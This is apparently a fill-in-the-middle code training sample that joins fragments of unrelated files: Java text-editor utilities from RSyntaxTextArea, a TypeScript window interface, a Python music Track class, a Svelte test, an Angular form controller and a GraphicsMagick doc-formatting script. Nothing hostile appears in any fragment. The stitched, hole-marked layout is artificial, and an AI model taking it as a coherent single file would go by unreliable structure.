int caretPosition = textArea.getCaretPosition() - 1;
RSyntaxDocument doc = (RSyntaxDocument)textArea.getDocument();
char bracket = 0;
// If the caret was at offset 0, we can't check "to its left."
if (caretPosition>=0) {
bracket = doc.charAt(caretPosition);
}
// Try to match a bracket "to the right" of the caret if one
// was not found on the left.
int index = BRACKETS.indexOf(bracket);
if (index==-1 && caretPosition<doc.getLength()-1) {
bracket = doc.charAt(++caretPosition);
}
// First, see if the char was a bracket (one of "{[()]}").
if (index==-1) {
index = BRACKETS.indexOf(bracket);
if (index==-1) {
return input;
}
}
// If it was, then make sure this bracket isn't sitting in
// the middle of a comment or string. If it isn't, then
// initialize some stuff so we can continue on.
char bracketMatch;
boolean goForward;
Element map = doc.getDefaultRootElement();
int curLine = map.getElementIndex(caretPosition);
Element line = map.getElement(curLine);
int start = line.getStartOffset();
int end = line.getEndOffset();
Token token = doc.getTokenListForLine(curLine);
token = RSyntaxUtilities.getTokenAtOffset(token, caretPosition);
// All brackets are always returned as "separators."
if (token.getType()!=Token.SEPARATOR) {
return input;
}
if (index<3) { // One of "{[("
goForward = true;
bracketMatch = BRACKETS.charAt(index + 3);
}
else { // One of ")]}"
goForward = false;
bracketMatch = BRACKETS.charAt(index - 3);
}
if (goForward) {
int lastLine = map.getElementCount();
// Start just after the found bracket since we're sure
// we're not in a comment.
start = caretPosition + 1;
int numEmbedded = 0;
boolean haveTokenList = false;
while (true) {
doc.getText(start,end-start, charSegment);
int segOffset = charSegment.offset;
for (int i=segOffset; i<segOffset+charSegment.count; i++) {
char ch = charSegment.array[i];
if (ch==bracket) {
if (haveTokenList==false) {
token = doc.getTokenListForLine(curLine);
haveTokenList = true;
}
int offset = start + (i-segOffset);
token = RSyntaxUtilities.getTokenAtOffset(token, offset);
if (token.getType()==Token.SEPARATOR)
numEmbedded++;
}
else if (ch==bracketMatch) {
if (haveTokenList==false) {
token = doc.getTokenListForLine(curLine);
haveTokenList = true;
}
int offset = start + (i-segOffset);
token = RSyntaxUtilities.getTokenAtOffset(token, offset);
if (token.getType()==Token.SEPARATOR) {
if (numEmbedded==0) {
if (textArea.isCodeFoldingEnabled() &&
textArea.getFoldManager().isLineHidden(curLine)) {
return input; // Match hidden in a fold
}
input.setLocation(caretPosition, offset);
return input;
}
numEmbedded--;
}
}
} // End of for (int i=segOffset; i<segOffset+charSegment.count; i++).
// Bail out if we've gone through all lines and
// haven't found the match.
if (++curLine==lastLine)
return input;
// Otherwise, go through the next line.
haveTokenList = false;
line = map.getElement(curLine);
start = line.getStartOffset();
end = line.getEndOffset();
} // End of while (true).
} // End of if (goForward).
// Otherwise, we're going backward through the file
// (since we found '}', ')' or ']').
else { // goForward==false
// End just before the found bracket since we're sure
// we're not in a comment.
end = caretPosition;// - 1;
int numEmbedded = 0;
boolean haveTokenList = false;
Token t2;
while (true) {
doc.getText(start,end-start, charSegment);
int segOffset = charSegment.offset;
int iStart = segOffset + charSegment.count - 1;
for (int i=iStart; i>=segOffset; i--) {
char ch = charSegment.array[i];
if (ch==bracket) {
if (haveTokenList==false) {
token = doc.getTokenListForLine(curLine);
haveTokenList = true;
}
int offset = start + (i-segOffset);
t2 = RSyntaxUtilities.getTokenAtOffset(token, offset);
if (t2.getType()==Token.SEPARATOR)
numEmbedded++;
}
else if (ch==bracketMatch) {
if (haveTokenList==false) {
token = doc.getTokenListForLine(curLine);
haveTokenList = true;
}
int offset = start + (i-segOffset);
t2 = RSyntaxUtilities.getTokenAtOffset(token, offset);
if (t2.getType()==Token.SEPARATOR) {
if (numEmbedded==0) {
input.setLocation(caretPosition, offset);
return input;
}
numEmbedded--;
}
}
}
// Bail out if we've gone through all lines and
// haven't found the match.
if (--curLine==-1) {
return input;
}
// Otherwise, get ready for going through the
// next line.
haveTokenList = false;
line = map.getElement(curLine);
start = line.getStartOffset();
end = line.getEndOffset();
} // End of while (true).
} // End of else.
} catch (BadLocationException ble) {
// Shouldn't ever happen.
ble.printStackTrace();
}
// Something went wrong...
return input;
}
/**
* Returns the next non-whitespace, non-comment token in a text area.
*
* @param t The next token in this line's token list.
* @param textArea The text area.
* @param line The current line index (the line index of <code>t</code>).
* @return The next non-whitespace, non-comment token, or <code>null</code>
* if there isn't one.
* @see #getPreviousImportantToken(RSyntaxTextArea, int)
*/
public static final Token getNextImportantToken(Token t,
RSyntaxTextArea textArea, int line) {
while (t!=null && t.isPaintable() && t.isCommentOrWhitespace()) {
t = t.getNextToken();
}
if ((t==null || !t.isPaintable()) && line<textArea.getLineCount()-1) {
t = textArea.getTokenListForLine(++line);
return getNextImportantToken(t, textArea, line);
}
return t;
}
/**
* Provides a way to determine the next visually represented model
* location at which one might place a caret.
* Some views may not be visible,
* they might not be in the same order found in the model, or they just
* might not allow access to some of the locations in the model.<p>
*
* NOTE: You should only call this method if the passed-in
* <code>javax.swing.text.View</code> is an instance of
* {@link TokenOrientedView} and <code>javax.swing.text.TabExpander</code>;
* otherwise, a <code>ClassCastException</code> could be thrown.
*
* @param pos the position to convert >= 0
* @param a the allocated region in which to render
* @param direction the direction from the current position that can
* be thought of as the arrow keys typically found on a keyboard.
* This will be one of the following values:
* <ul>
* <li>SwingConstants.WEST
* <li>SwingConstants.EAST
* <li>SwingConstants.NORTH
* <li>SwingConstants.SOUTH
* </ul>
* @return the location within the model that best represents the next
* location visual position
* @exception BadLocationException
* @exception IllegalArgumentException if <code>direction</code>
* doesn't have one of the legal values above
*/
public static int getNextVisualPositionFrom(int pos, Position.Bias b,
Shape a, int direction,
Position.Bias[] biasRet, View view)
throws BadLocationException {
RSyntaxTextArea target = (RSyntaxTextArea)view.getContainer();
biasRet[0] = Position.Bias.Forward;
// Do we want the "next position" above, below, to the left or right?
switch (direction) {
case NORTH:
case SOUTH:
if (pos == -1) {
pos = (direction == NORTH) ?
Math.max(0, view.getEndOffset() - 1) :
view.getStartOffset();
break;
}
Caret c = (target != null) ? target.getCaret() : null;
// YECK! Ideally, the x location from the magic caret
// position would be passed in.
Point mcp;
if (c != null)
mcp = c.getMagicCaretPosition();
else
mcp = null;
int x;
if (mcp == null) {
Rectangle loc = target.modelToView(pos);
x = (loc == null) ? 0 : loc.x;
}
else {
x = mcp.x;
}
if (direction == NORTH)
pos = getPositionAbove(target,pos,x,(TabExpander)view);
else
pos = getPositionBelow(target,pos,x,(TabExpander)view);
break;
case WEST:
if(pos == -1) {
pos = Math.max(0, view.getEndOffset() - 1);
}
else {
pos = Math.max(0, pos - 1);
if (target.isCodeFoldingEnabled()) {
int last = target.getLineOfOffset(pos+1);
int current = target.getLineOfOffset(pos);
if (last!=current) { // If moving up a line...
FoldManager fm = target.getFoldManager();
if (fm.isLineHidden(current)) {
while (--current>0 && fm.isLineHidden(current));
pos = target.getLineEndOffset(current) - 1;
}
}
}
}
break;
case EAST:
if(pos == -1) {
pos = view.getStartOffset();
}
else {
pos = Math.min(pos + 1, view.getDocument().getLength());
if (target.isCodeFoldingEnabled()) {
int last = target.getLineOfOffset(pos-1);
int current = target.getLineOfOffset(pos);
if (last!=current) { // If moving down a line...
FoldManager fm = target.getFoldManager();
if (fm.isLineHidden(current)) {
int lineCount = target.getLineCount();
while (++current<lineCount && fm.isLineHidden(current));
pos = current==lineCount ?
target.getLineEndOffset(last)-1 : // Was the last visible line
target.getLineStartOffset(current);
}
}
}
}
break;
default:
throw new IllegalArgumentException(
"Bad direction: " + direction);
}
return pos;
}
/**
* Determines the position in the model that is closest to the given
* view location in the row above. The component given must have a
* size to compute the result. If the component doesn't have a size
* a value of -1 will be returned.
*
* @param c the editor
* @param offs the offset in the document >= 0
* @param x the X coordinate >= 0
* @return the position >= 0 if the request can be computed, otherwise
* a value of -1 will be returned.
* @exception BadLocationException if the offset is out of range
*/
public static final int getPositionAbove(RSyntaxTextArea c, int offs,
float x, TabExpander e) throws BadLocationException {
TokenOrientedView tov = (TokenOrientedView)e;
Token token = tov.getTokenListForPhysicalLineAbove(offs);
if (token==null)
return -1;
// A line containing only Token.NULL is an empty line.
else if (token.getType()==Token.NULL) {
int line = c.getLineOfOffset(offs); // Sure to be >0 ??
return c.getLineStartOffset(line-1);
}
else {
return token.getListOffset(c, e, 0, x);
}
}
/**
* Determines the position in the model that is closest to the given
* view location in the row below. The component given must have a
* size to compute the result. If the component doesn't have a size
* a value of -1 will be returned.
*
* @param c the editor
* @param offs the offset in the document >= 0
* @param x the X coordinate >= 0
* @return the position >= 0 if the request can be computed, otherwise
* a value of -1 will be returned.
* @exception BadLocationException if the offset is out of range
*/
public static final int getPositionBelow(RSyntaxTextArea c, int offs,
float x, TabExpander e) throws BadLocationException {
TokenOrientedView tov = (TokenOrientedView)e;
Token token = tov.getTokenListForPhysicalLineBelow(offs);
if (token==null)
return -1;
// A line containing only Token.NULL is an empty line.
else if (token.getType()==Token.NULL) {
int line = c.getLineOfOffset(offs); // Sure to be > c.getLineCount()-1 ??
// return c.getLineStartOffset(line+1);
FoldManager fm = c.getFoldManager();
line = fm.getVisibleLineBelow(line);
return c.getLineStartOffset(line);
}
else {
return token.getListOffset(c, e, 0, x);
}
}
/**
* Returns the last non-whitespace, non-comment token, starting with the
* specified line.
*
* @param textArea The text area.
* @param line The line at which to start looking.
* @return The last non-whitespace, non-comment token, or <code>null</code>
* if there isn't one.
* @see #getNextImportantToken(Token, RSyntaxTextArea, int)
*/
public static final Token getPreviousImportantToken(
RSyntaxTextArea textArea, int line){
if (line<0) {
return null;
}
Token t = textArea.getTokenListForLine(line);
if (t!=null) {
t = t.getLastNonCommentNonWhitespaceToken();
if (t!=null) {
return t;
}
}
return getPreviousImportantToken(textArea, line-1);
}
/**
* Returns the token at the specified index, or <code>null</code> if
* the given offset isn't in this token list's range.<br>
* Note that this method does NOT check to see if <code>tokenList</code>
* is null; callers should check for themselves.
*
* @param tokenList The list of tokens in which to search.
* @param offset The offset at which to get the token.
* @return The token at <code>offset</code>, or <code>null</code> if
* none of the tokens are at that offset.
*/
public static final Token getTokenAtOffset(Token tokenList, int offset) {
for (Token t=tokenList; t!=null && t.isPaintable(); t=t.getNextToken()){
if (t.containsPosition(offset))
return t;
}
return null;
}
/**
* Returns the end of the word at the given offset.
*
* @param textArea The text area.
* @param offs The offset into the text area's content.
* @return The end offset of the word.
* @throws BadLocationException If <code>offs</code> is invalid.
* @see #getWordStart(RSyntaxTextArea, int)
*/
public static int getWordEnd(RSyntaxTextArea textArea, int offs)
throws BadLocationException {
Document doc = textArea.getDocument();
int endOffs = textArea.getLineEndOffsetOfCurrentLine();
int lineEnd = Math.min(endOffs, doc.getLength());
if (offs == lineEnd) { // End of the line.
return offs;
}
String s = doc.getText(offs, lineEnd-offs-1);
if (s!=null && s.length()>0) { // Should always be true
int i = 0;
int count = s.length();
char ch = s.charAt(i);
if (Character.isWhitespace(ch)) {
while (i<count && Character.isWhitespace(s.charAt(i++)));
}
else if (Character.isLetterOrDigit(ch)) {
while (i<count && Character.isLetterOrDigit(s.charAt(i++)));
}
else {
i = 2;
}
offs += i - 1;
}
return offs;
}
/**
* Returns the start of the word at the given offset.
*
* @param textArea The text area.
* @param offs The offset into the text area's content.
* @return The start offset of the word.
* @throws BadLocationException If <code>offs</code> is invalid.
* @see #getWordEnd(RSyntaxTextArea, int)
*/
public static int getWordStart(RSyntaxTextArea textArea, int offs)
throws BadLocationException {
Document doc = textArea.getDocument();
Element line = getLineElem(doc, offs);
if (line == null) {
throw new BadLocationException("No word at " + offs, offs);
}
<|fim▁hole|> }
int endOffs = Math.min(offs+1, doc.getLength());
String s = doc.getText(lineStart, endOffs-lineStart);
if(s != null && s.length() > 0) {
int i = s.length() - 1;
char ch = s.charAt(i);
if (Character.isWhitespace(ch)) {
while (i>0 && Character.isWhitespace(s.charAt(i-1))) {
i--;
}
offs = lineStart + i;
}
else if (Character.isLetterOrDigit(ch)) {
while (i>0 && Character.isLetterOrDigit(s.charAt(i-1))) {
i--;
}
offs = lineStart + i;
}
}
return offs;
}
/**
* Determines the width of the given token list taking tabs
* into consideration. This is implemented in a 1.1 style coordinate
* system where ints are used and 72dpi is assumed.<p>
*
* This method also assumes that the passed-in token list begins at
* x-pixel <code>0</code> in the view (for tab purposes).
*
* @param tokenList The tokenList list representing the text.
* @param textArea The text area in which this token list resides.
* @param e The tab expander. This value cannot be <code>null</code>.
* @return The width of the token list, in pixels.
*/
public static final float getTokenListWidth(Token tokenList,
RSyntaxTextArea textArea,
TabExpander e) {
return getTokenListWidth(tokenList, textArea, e, 0);
}
/**
* Determines the width of the given token list taking tabs
* into consideration. This is implemented in a 1.1 style coordinate
* system where ints are used and 72dpi is assumed.<p>
*
* @param tokenList The token list list representing the text.
* @param textArea The text area in which this token list resides.
* @param e The tab expander. This value cannot be <code>null</code>.
* @param x0 The x-pixel coordinate of the start of the token list.
* @return The width of the token list, in pixels.
* @see #getTokenListWidthUpTo
*/
public static final float getTokenListWidth(final Token tokenList,
RSyntaxTextArea textArea,
TabExpander e, float x0) {
float width = x0;
for (Token t=tokenList; t!=null&&t.isPaintable(); t=t.getNextToken()) {
width += t.getWidth(textArea, e, width);
}
return width - x0;
}
/**
* Determines the width of the given token list taking tabs into
* consideration and only up to the given index in the document
* (exclusive).
*
* @param tokenList The token list representing the text.
* @param textArea The text area in which this token list resides.
* @param e The tab expander. This value cannot be <code>null</code>.
* @param x0 The x-pixel coordinate of the start of the token list.
* @param upTo The document position at which you want to stop,
* exclusive. If this position is before the starting position
* of the token list, a width of <code>0</code> will be
* returned; similarly, if this position comes after the entire
* token list, the width of the entire token list is returned.
* @return The width of the token list, in pixels, up to, but not
* including, the character at position <code>upTo</code>.
* @see #getTokenListWidth
*/
public static final float getTokenListWidthUpTo(final Token tokenList,
RSyntaxTextArea textArea, TabExpander e,
float x0, int upTo) {
float width = 0;
for (Token t=tokenList; t!=null&&t.isPaintable(); t=t.getNextToken()) {
if (t.containsPosition(upTo)) {
return width + t.getWidthUpTo(upTo-t.getOffset(), textArea, e,
x0+width);
}
width += t.getWidth(textArea, e, x0+width);
}
return width;
}
/**
* Returns whether or not this character is a "bracket" to be matched by
* such programming languages as C, C++, and Java.
*
* @param ch The character to check.
* @return Whether or not the character is a "bracket" - one of '(', ')',
* '[', ']', '{', and '}'.
*/
public static final boolean isBracket(char ch) {
// We need the first condition as it might be that ch>255, and thus
// not in our table. '}' is the highest-valued char in the bracket
// set.
return ch<='}' && (dataTable[ch]&BRACKET_MASK)>0;
}
/**
* Returns whether or not a character is a digit (0-9).
*
* @param ch The character to check.
* @return Whether or not the character is a digit.
*/
public static final boolean isDigit(char ch) {
// We do it this way as we'd need to do two conditions anyway (first
// to check that ch<255 so it can index into our table, then whether
// that table position has the digit mask).
return ch>='0' && ch<='9';
}
/**
* Returns whether or not this character is a hex character. This method
* accepts both upper- and lower-case letters a-f.
*
* @param ch The character to check.
* @return Whether or not the character is a hex character 0-9, a-f, or
* A-F.
*/
public static final boolean isHexCharacter(char ch) {
// We need the first condition as it could be that ch>255 (and thus
// not a valid index into our table). 'f' is the highest-valued
// char that is a valid hex character.
return (ch<='f') && (dataTable[ch]&HEX_CHARACTER_MASK)>0;
}
/**
* Returns whether a character is a Java operator. Note that C and C++
* operators are the same as Java operators.
*
* @param ch The character to check.
* @return Whether or not the character is a Java operator.
*/
public static final boolean isJavaOperator(char ch) {
// We need the first condition as it could be that ch>255 (and thus
// not a valid index into our table). '~' is the highest-valued
// char that is a valid Java operator.
return (ch<='~') && (dataTable[ch]&JAVA_OPERATOR_MASK)>0;
}
/**
* Returns whether a character is a US-ASCII letter (A-Z or a-z).
*
* @param ch The character to check.
* @return Whether or not the character is a US-ASCII letter.
*/
public static final boolean isLetter(char ch) {
// We need the first condition as it could be that ch>255 (and thus
// not a valid index into our table).
return (ch<='z') && (dataTable[ch]&LETTER_MASK)>0;
}
/**
* Returns whether or not a character is a US-ASCII letter or a digit.
*
* @param ch The character to check.
* @return Whether or not the character is a US-ASCII letter or a digit.
*/
public static final boolean isLetterOrDigit(char ch) {
// We need the first condition as it could be that ch>255 (and thus
// not a valid index into our table).
return (ch<='z') && (dataTable[ch]&LETTER_OR_DIGIT_MASK)>0;
}
/**
* Returns whether the specified color is "light" to use as a foreground.
* Colors that return <code>true</code> indicate that the current Look and
* Feel probably uses light text colors on a dark background.
*
* @param fg The foreground color.
* @return Whether it is a "light" foreground color.
* @see #getHyperlinkForeground()
*/
public static final boolean isLightForeground(Color fg) {
return fg.getRed()>0xa0 && fg.getGreen()>0xa0 && fg.getBlue()>0xa0;
}
/**
* Returns whether or not a character is a whitespace character (either
* a space ' ' or tab '\t'). This checks for the Unicode character values
* 0x0020 and 0x0009.
*
* @param ch The character to check.
* @return Whether or not the character is a whitespace character.
*/
public static final boolean isWhitespace(char ch) {
// We do it this way as we'd need to do two conditions anyway (first
// to check that ch<255 so it can index into our table, then whether
// that table position has the whitespace mask).
return ch==' ' || ch=='\t';
}
/**
* Returns whether a regular expression token can follow the specified
* token in JavaScript.
*
* @param t The token to check, which may be <code>null</code>.
* @return Whether a regular expression token may follow this one in
* JavaScript.
*/
public static boolean regexCanFollowInJavaScript(Token t) {
char ch;
// We basically try to mimic Eclipse's JS editor's behavior here.
return t==null ||
//t.isOperator() ||
(t.length()==1 && (
(ch=t.charAt(0))=='=' ||
ch=='(' ||
ch==',' ||
ch=='?' ||
ch==':' ||
ch=='[' ||
ch=='!' ||
ch=='&'
)) ||
/* Operators "==", "===", "!=", "!==" */
(t.getType()==Token.OPERATOR &&
t.charAt(t.length()-1)=='=') ||
t.is(Token.RESERVED_WORD_2, JS_KEYWORD_RETURN);
}
/**
* If the character is an upper-case US-ASCII letter, it returns the
* lower-case version of that letter; otherwise, it just returns the
* character.
*
* @param ch The character to lower-case (if it is a US-ASCII upper-case
* character).
* @return The lower-case version of the character.
*/
public static final char toLowerCase(char ch) {
// We can logical OR with 32 because A-Z are 65-90 in the ASCII table
// and none of them have the 6th bit (32) set, and a-z are 97-122 in
// the ASCII table, which is 32 over from A-Z.
// We do it this way as we'd need to do two conditions anyway (first
// to check that ch<255 so it can index into our table, then whether
// that table position has the upper-case mask).
if (ch>='A' && ch<='Z')
return (char)(ch | 0x20);
return ch;
}
/**
* Returns an integer constant representing the OS. This can be handy for
* special case situations such as Mac OS-X (special application
* registration) or Windows (allow mixed case, etc.).
*
* @return An integer constant representing the OS.
*/
public static final int getOS() {
return OS;
}
/**
* Returns an integer constant representing the OS. This can be handy for
* special case situations such as Mac OS-X (special application
* registration) or Windows (allow mixed case, etc.).
*
* @return An integer constant representing the OS.
*/
private static final int getOSImpl() {
int os = OS_OTHER;
String osName = System.getProperty("os.name");
if (osName!=null) { // Should always be true.
osName = osName.toLowerCase();
if (osName.indexOf("windows") > -1)
os = OS_WINDOWS;
else if (osName.indexOf("mac os x") > -1)
os = OS_MAC_OSX;
else if (osName.indexOf("linux") > -1)
os = OS_LINUX;
else
os = OS_OTHER;
}
return os;
}
/**
* Creates a regular expression pattern that matches a "wildcard" pattern.
*
* @param wildcard The wildcard pattern.
* @param matchCase Whether the pattern should be case sensitive.
* @param escapeStartChar Whether to escape a starting <code>'^'</code>
* character.
* @return The pattern.
*/
public static Pattern wildcardToPattern(String wildcard, boolean matchCase,
boolean escapeStartChar) {
int flags = 0;
if (!matchCase) {
flags = Pattern.CASE_INSENSITIVE|Pattern.UNICODE_CASE;
}
StringBuilder sb = new StringBuilder();
for (int i=0; i<wildcard.length(); i++) {
char ch = wildcard.charAt(i);
switch (ch) {
case '*':
sb.append(".*");
break;
case '?':
sb.append('.');
break;
case '^':
if (i>0 || escapeStartChar) {
sb.append('\\');
}
sb.append('^');
break;
case '\\':
case '.': case '|':
case '+': case '-':
case '$':
case '[': case ']':
case '{': case '}':
case '(': case ')':
sb.append('\\').append(ch);
break;
default:
sb.append(ch);
break;
}
}
Pattern p = null;
try {
p = Pattern.compile(sb.toString(), flags);
} catch (PatternSyntaxException pse) {
pse.printStackTrace();
p = Pattern.compile(".+");
}
return p;
}
}<|fim▁end|> | int lineStart = line.getStartOffset();
if (offs==lineStart) { // Start of the line.
return offs;
|
<|file_name|>IWindow.ts<|end_file_name|><|fim▁begin|>"use strict";
/**
* Additional Interfaces
*/
import ILocalStorage from "./ILocalStorage";
/**
* The Window interface
*/
interface IWindow {
atob: any;
btoa: any;
escape: any;
unescape: any;
location: any;
Promise: any;
document: Document;
addEventListener: Function;
removeEventListener: Function;
localStorage: ILocalStorage;
}<|fim▁hole|> * Declare window interface
*/
declare var window: IWindow;
/**
* Export the window interface
*/
export default IWindow;<|fim▁end|> | /** |
<|file_name|>track.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
# -*- coding: utf-8 -*-
# mingus - Music theory Python package, track module.
# Copyright (C) 2008-2009, Bart Spaans
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from mt_exceptions import InstrumentRangeError
from mingus.containers.note_container import NoteContainer
from mingus.containers.bar import Bar
import mingus.core.value as value
class Track(object):
"""A track object.
The Track class can be used to store Bars and to work on them.
The class is also designed to be used with Instruments, but this is
optional.
Tracks can be stored together in Compositions.
"""
bars = []
instrument = None
name = 'Untitled' # Will be looked for when saving a MIDI file.
tuning = None # Used by tablature
def __init__(self, instrument=None):
self.bars = []
self.instrument = instrument
def add_bar(self, bar):
"""Add a Bar to the current track."""
self.bars.append(bar)
return self
def add_notes(self, note, duration=None):
"""Add a Note, note as string or NoteContainer to the last Bar.
If the Bar is full, a new one will automatically be created.
If the Bar is not full but the note can't fit in, this method will
return False. True otherwise.
An InstrumentRangeError exception will be raised if an Instrument is
attached to the Track, but the note turns out not to be within the
range of the Instrument.
"""
if self.instrument != None:
if not self.instrument.can_play_notes(note):
raise InstrumentRangeError, \
"Note '%s' is not in range of the instrument (%s)" % (note,
self.instrument)
if duration == None:
duration = 4
# Check whether the last bar is full, if so create a new bar and add the
# note there
if len(self.bars) == 0:
self.bars.append(Bar())
last_bar = self.bars[-1]
if last_bar.is_full():
self.bars.append(Bar(last_bar.key, last_bar.meter))
# warning should hold note if it doesn't fit
return self.bars[-1].place_notes(note, duration)
def get_notes(self):
"""Return an iterator that iterates through every bar in the this<|fim▁hole|> for beat, duration, notes in bar:
yield beat, duration, notes
def from_chords(self, chords, duration=1):
"""Add chords to the Track.
The given chords should be a list of shorthand strings or list of
list of shorthand strings, etc.
Each sublist divides the value by 2.
If a tuning is set, chords will be expanded so they have a proper
fingering.
Example:
>>> t = Track().from_chords(['C', ['Am', 'Dm'], 'G7', 'C#'], 1)
"""
tun = self.get_tuning()
def add_chord(chord, duration):
if type(chord) == list:
for c in chord:
add_chord(c, duration * 2)
else:
chord = NoteContainer().from_chord(chord)
if tun:
chord = tun.find_chord_fingering(chord,
return_best_as_NoteContainer=True)
if not self.add_notes(chord, duration):
# This should be the standard behaviour of add_notes
dur = self.bars[-1].value_left()
self.add_notes(chord, dur)
# warning should hold note
self.add_notes(chord, value.subtract(duration, dur))
for c in chords:
if c is not None:
add_chord(c, duration)
else:
self.add_notes(None, duration)
return self
def get_tuning(self):
"""Return a StringTuning object.
If an instrument is set and has a tuning it will be returned.
Otherwise the track's one will be used.
"""
if self.instrument and self.instrument.tuning:
return self.instrument.tuning
return self.tuning
def set_tuning(self, tuning):
"""Set the tuning attribute on both the Track and its instrument (when
available).
Tuning should be a StringTuning or derivative object.
"""
if self.instrument:
self.instrument.tuning = tuning
self.tuning = tuning
return self
def transpose(self, interval, up=True):
"""Transpose all the notes in the track up or down the interval.
Call transpose() on every Bar.
"""
for bar in self.bars:
bar.transpose(interval, up)
return self
def augment(self):
"""Augment all the bars in the Track."""
for bar in self.bars:
bar.augment()
return self
def diminish(self):
"""Diminish all the bars in the Track."""
for bar in self.bars:
bar.diminish()
return self
def __add__(self, value):
"""Enable the '+' operator for Tracks.
Notes, notes as string, NoteContainers and Bars accepted.
"""
if hasattr(value, 'bar'):
return self.add_bar(value)
elif hasattr(value, 'notes'):
return self.add_notes(value)
elif hasattr(value, 'name') or type(value) == str:
return self.add_notes(value)
def test_integrity(self):
"""Test whether all but the last Bars contained in this track are
full."""
for b in self.bars[:-1]:
if not b.is_full():
return False
return True
def __eq__(self, other):
"""Enable the '==' operator for tracks."""
for x in range(0, len(self.bars) - 1):
if self.bars[x] != other.bars[x]:
return False
return True
def __getitem__(self, index):
"""Enable the '[]' notation for Tracks."""
return self.bars[index]
def __setitem__(self, index, value):
"""Enable the '[] =' notation for Tracks.
Throw an UnexpectedObjectError if the value being set is not a
mingus.containers.Bar object.
"""
if not hasattr(value, 'bar'):
raise UnexpectedObjectError("Unexpected object '%s', "
"expecting a mingus.containers.Barobject" % value)
self.bars[index] = value
def __repr__(self):
"""Return a string representing the class."""
return str([self.instrument, self.bars])
def __len__(self):
"""Enable the len() function for Tracks."""
return len(self.bars)<|fim▁end|> | track."""
for bar in self.bars: |
<|file_name|>_config.js<|end_file_name|><|fim▁begin|>export default {
html: `
<p>42</p>
<p>42</p>
`,
async test({ assert, component, target }) {
await component.updateStore(undefined);
assert.htmlEqual(target.innerHTML, '<p>undefined</p><p>42</p>');
await component.updateStore(33);
assert.htmlEqual(target.innerHTML, '<p>33</p><p>42</p>');
await component.updateStore(undefined);
assert.htmlEqual(target.innerHTML, '<p>undefined</p><p>42</p>');
await component.updateVar(undefined);
assert.htmlEqual(target.innerHTML, '<p>undefined</p><p>undefined</p>');
await component.updateVar(33);
assert.htmlEqual(target.innerHTML, '<p>undefined</p><p>33</p>');
await component.updateVar(undefined);<|fim▁hole|><|fim▁end|> | assert.htmlEqual(target.innerHTML, '<p>undefined</p><p>undefined</p>');
}
}; |
<|file_name|>register-form.controller.js<|end_file_name|><|fim▁begin|>(function() {
'use strict';
angular.module('cd.app.registerForm')
.controller('RegisterFormController', RegisterFormController);
/* @ngInject */
function RegisterFormController ($location, StepsService) {<|fim▁hole|> var $ctrl = this;
$ctrl.selectedPlatform = JSON.parse(localStorage.getItem('selectedPlatform'));
$ctrl.selectedPackage = JSON.parse(localStorage.getItem('selectedPackage'));
if (StepsService.currentStep < StepsService.REGISTER) {
$location.path('/package');
} else {
_init();
}
function _init () {
$ctrl.registerForm = {
nome: '',
email: '',
nascimento: '',
cpf: '',
telefone: ''
};
$ctrl.submit = submit;
function submit () {
console.groupCollapsed('Formulário Enviado');
console.log('Formulário de registro', $ctrl.registerForm);
console.log('Plano Selecionado', $ctrl.selectedPackage);
console.log('Plataforma Selecionada', $ctrl.selectedPlatform);
console.groupEnd();
};
};
};
})();<|fim▁end|> | |
<|file_name|>format_c_api_doc.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ts=4:sw=4:expandtab:
# Copyright 2008 Mark Mitchell
# License: see __license__ below.
__doc__ = """
Reads a GraphicsMagick source file and parses the specially formatted
comment blocks which precede each function and writes the information
obtained from the comment block into a reStructuredText file.
Usage:
format_c_api_docs.py [options] SRCFILE OUTFILE
SRCFILE is the path to a Graphicsmagick API .c file.
For example: ./magick/animate.c
OUTFILE is the path where the reStructuredText file is written.
Options:
-h --help -- Print this help message
-w --whatis-file -- The path to a file containing "whatis" information for
the source files. The format of this file is:
* one line per source file
* source filename (without directory paths) and whatis text
are separated by whitespace
* blank lines are ignored
* lines starting with '#' are ignored
-i --include-rst -- Comma-separated list of file paths to be objects of reST
..include:: directives inserted in OUTFILE.
The default is the single file 'api_hyperlinks.rst'
Example of whatis file format:
animate.c Interactively animate an image sequence
annotate.c Annotate an image with text
"""
__copyright__ = "2008, Mark Mitchell"
__license__ = """
Copyright 2008, Mark Mitchell
Permission is hereby granted, free of charge, to any person obtaining
a copy of this Software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
The Software is provided "as is", without warranty of any kind,
express or implied, including but not limited to the warranties of
merchantability, fitness for a particular purpose and noninfringement.
In no event shall the authors or copyright holders be liable for any
claim, damages or other liability, whether in an action of contract,
tort or otherwise, arising from, out of or in connection with Software
or the use or other dealings in the Software.
"""
import sys
import getopt
import os, os.path
import re
import textwrap
# Key words to replace with HTML links
keywords = {
'AffineMatrix' : '`AffineMatrix`_',
'BlobInfo' : '`BlobInfo`_',
'Cache' : '`Cache`_',
'ChannelType' : '`ChannelType`_',
'ChromaticityInfo' : '`ChromaticityInfo`_',
'ClassType' : '`ClassType`_',
'ClipPathUnits' : '`ClipPathUnits`_',
'ColorPacket' : '`ColorPacket`_',
'ColorspaceType' : '`ColorspaceType`_',
'ComplianceType' : '`ComplianceType`_',
'CompositeOperator' : '`CompositeOperator`_',
'CompressionType' : '`CompressionType`_',
'DecorationType' : '`DecorationType`_',
'DrawContext' : '`DrawContext`_',
'DrawInfo' : '`DrawInfo`_',
'ErrorHandler' : '`ErrorHandler`_',
'ExceptionInfo' : '`ExceptionInfo`_',
'ExceptionType' : '`ExceptionType`_',
'FillRule' : '`FillRule`_',
'FilterTypes' : '`FilterTypes`_',
'FrameInfo' : '`FrameInfo`_',
'GravityType' : '`GravityType`_',
'Image' : '`Image`_',
'ImageInfo' : '`ImageInfo`_',
'ImageType' : '`ImageType`_',
'InterlaceType' : '`InterlaceType`_',
'LayerType' : '`LayerType`_',
'MagickInfo' : '`MagickInfo`_',
